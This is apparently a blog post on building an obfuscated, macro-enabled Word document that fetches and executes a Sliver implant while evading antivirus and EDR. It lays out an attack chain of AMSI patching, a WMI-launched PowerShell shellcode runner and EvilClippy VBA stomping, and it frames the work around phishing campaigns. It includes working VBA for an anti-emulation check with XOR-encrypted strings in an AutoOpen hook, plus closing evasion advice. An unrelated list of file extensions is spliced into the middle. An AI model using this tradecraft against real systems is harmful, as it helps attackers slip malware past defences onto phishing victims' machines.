I wanted to create an obfuscated, macro-enabled Office document that retrieves and executes a Sliver implant without triggering antivirus/EDR. This blog post is a summary of a recent macro I made and the research that inspired the decisions behind it. To start, this article assumes you have the basics of VBA down and know that executing macros in Microsoft documents can lead to unwanted actions on your device.

I was working on my OSEP certification when I was inspired to stop studying for a bit and deep-dive into malicious Word documents. The OSEP certification inspired a lot of the content you'll see here and gave me a base to work up from. If you're looking for your next cyber security knowledge binge, I'd highly recommend the OSEP. I am taking this certification course after taking the eCPTXv2, and I am still learning a lot of topics that weren't covered in the eCPTXv2. Both certifications have their positives and negatives.

On my macro creation journey, I initially found that my macro-enabled document had a very high detection rate no matter what I tried in order to bypass AV engines. The original file was detected, at the lowest, by 7 out of 20 engines. Although this is less than half of the engines the service tests against, it is still relatively high if you don't know what you're up against before you perform your phishing campaign. Conversely, if you do know what you're up against, then you only need to worry about that engine. Over the course of tweaking it, I got the detection down to 2 of 20 in the end. This has slowly risen to 5, as the engines are always evolving.

.cmd: DOS Command File, Command File for Windows NT
.cpl: Windows Control Panel Extension (Microsoft)
.ins: IIS Internet Communications Settings (Microsoft)
.isp: IIS Internet Service Provider Settings (Microsoft)
.its: Internet Document Set, International Translation
.mda: Access Add-in (Microsoft), MDA Access 2 Workgroup (Microsoft)
.mdb: Access Application (Microsoft), MDB Access Database (Microsoft)
.mdw: Access Workgroup Information (Microsoft)
.msc: Microsoft Management Console Snap-in Control File (Microsoft)

The following flow represents the code I ended up with:

1. Import Windows APIs
2. Check for emulation before running
3. Obfuscate AMSI-related function strings
4. Identify the addresses of the AmsiScanBuffer and AmsiScanString functions relative to the AmsiUacInitialize function
5. Patch AMSI in VBA memory
6. Decode custom-obfuscated PoSH commands
7. Instantiate a powershell.exe process via a WMI object
8. Disable AMSI in PoSH
9. Retrieve the Stage 1 PoSH shellcode runner
10. The shellcode runner retrieves the Sliver implant bytecode, loads it in memory, and executes it
11. The VBA is stomped with EvilClippy so the VBA source is non-malicious

Emulation Checks

Before we get into patching AMSI in VBA, we'll go over some simple tests you can perform in an attempt to detect whether your VBA is running in an emulated environment and, if so, stop the macro from executing anything malicious. These are simply attempts to prevent heuristics-based anti-virus engines from flagging our payload as malicious. I created three simple tests that run at the start of the macro execution to prevent anything malicious from being executed if we detect we're in an emulated environment.

First, we start with the Document Name test. Many times, if an anti-virus engine is emulating the execution of a VBA macro, it may change the name of the document or append a number to it so that multiple runs are logged with some uniqueness. This test simply checks whether our payload is being run by a document with the same name as the original. Again, we use our PowerShell script to encrypt the static string that is the document name and call our Joy function to decrypt it at run time. If the active document name does not match the name of the document we specify, the check fails and we exit the subroutine. Similarly, if we know ahead of time the file path that the document will be executed from, we can use that to determine whether we're running in an anti-virus engine.
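The Document Name test described above, written out as an added example. This is not the post's own macro: "Joy" here is a stand-in for the author's decrypt routine with an assumed layout (hex-encoded ciphertext XORed against a repeating ASCII key), the offline encrypter is done in VBA instead of the author's PowerShell script so it can be run from the VBE Immediate window, and the key "k3y" and the document name "Invoice.docm" are constructed sample values.

```vba
' Added example, not the post's own code. Demonstrates the Document Name
' emulation check with the expected name kept XOR-encrypted in the source and
' decrypted at run time, so the plaintext name never appears in the macro.
' Assumed layout: hex ciphertext, repeating ASCII key. Sample values are constructed.

' Decrypt a hex-encoded, XOR-encrypted string with a repeating key.
Private Function Joy(ByVal hexCipher As String, ByVal xorKey As String) As String
    Dim i As Long, b As Integer, out As String
    For i = 1 To Len(hexCipher) Step 2
        b = CInt("&H" & Mid$(hexCipher, i, 2))
        b = b Xor Asc(Mid$(xorKey, ((i - 1) \ 2) Mod Len(xorKey) + 1, 1))
        out = out & Chr$(b)
    Next i
    Joy = out
End Function

' Inverse of Joy. Run once offline (e.g. in the Immediate window) to produce the
' ciphertext constant; it stands in for the post's PowerShell encrypter.
Private Function MakeCipher(ByVal plain As String, ByVal xorKey As String) As String
    Dim i As Long, b As Integer, out As String
    For i = 1 To Len(plain)
        b = Asc(Mid$(plain, i, 1)) Xor Asc(Mid$(xorKey, (i - 1) Mod Len(xorKey) + 1, 1))
        out = out & Right$("0" & Hex$(b), 2)
    Next i
    MakeCipher = out
End Function

' Document Name test: emulators frequently rename the document or append a
' number to it, so a mismatch is treated as "not running where we expect".
Private Function DocNameCheckPassed() As Boolean
    Const XOR_KEY As String = "k3y"
    ' Output of MakeCipher("Invoice.docm", "k3y")
    Const ENC_NAME As String = "225D0F045A1A0E1D1D045014"
    ' Case-insensitive compare: NTFS file names are case-insensitive.
    DocNameCheckPassed = (StrComp(ActiveDocument.Name, Joy(ENC_NAME, XOR_KEY), vbTextCompare) = 0)
End Function

Sub AutoOpen()
    ' Bail out before anything suspicious runs if the check fails.
    If Not DocNameCheckPassed() Then Exit Sub
    ' ... remaining stages of the macro go here ...
End Sub
```

To check the full path instead of just the name, as the post mentions, compare against ActiveDocument.FullName with a path-encoded constant in the same way. Two caveats a practitioner should weigh: the check is only as good as the emulator's renaming habit, so a sandbox that preserves the file name passes it, and a target who saves the attachment under a different name fails it, which silently costs you the execution. The check trades reliability for evasion; decide per campaign whether that trade is worth it.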